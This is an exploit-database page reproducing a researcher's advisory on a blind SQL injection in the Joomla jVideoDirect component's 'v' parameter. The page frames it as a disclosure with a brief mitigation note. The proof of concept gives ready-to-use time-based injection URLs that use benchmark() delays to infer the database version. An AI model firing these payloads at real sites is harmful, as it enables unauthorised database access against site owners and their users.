header-logo
Suggest Exploit
vendor:
jVideoDirect
by:
B-HUNT3|2
5,5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: jVideoDirect
Affected Version From: 1.1 RC3b
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

Joomla (jVideoDirect) BLIND SQL Injection Vulnerability

Input var v is vulnerable to SQL Code Injection. A proof of concept is provided which involves sending two requests to the server, one with a substring of the version set to 5 and one with a substring of the version set to 4. If the response time is high, the version substring is 5, and if the response time is low, the version substring is 4.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (jVideoDirect) BLIND SQL Injection Vulnerability 
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TYPE: COMMERCIAL
[~]>> PRICE: N/A

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var v is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.1 RC3b but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://server/?v=[SQL]

[~]>> {RETURN TRUE::RETURN FALSE} ---> VIEW TIME RESPONSE ||| HIGH: TRUE ||| LOW: FALSE

[~]>> http://server/?v=NXRG9xz403238%27+AND%200=if(substring(@@version,1,1)=5,benchmark(9999999,md5(@@version)),0)%23
[~]>> http://server/?v=NXRG9xz403238%27+AND%200=if(substring(@@version,1,1)=4,benchmark(9999999,md5(@@version)),0)%23

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...

Navigation

Suggest Exploit

Services By CQR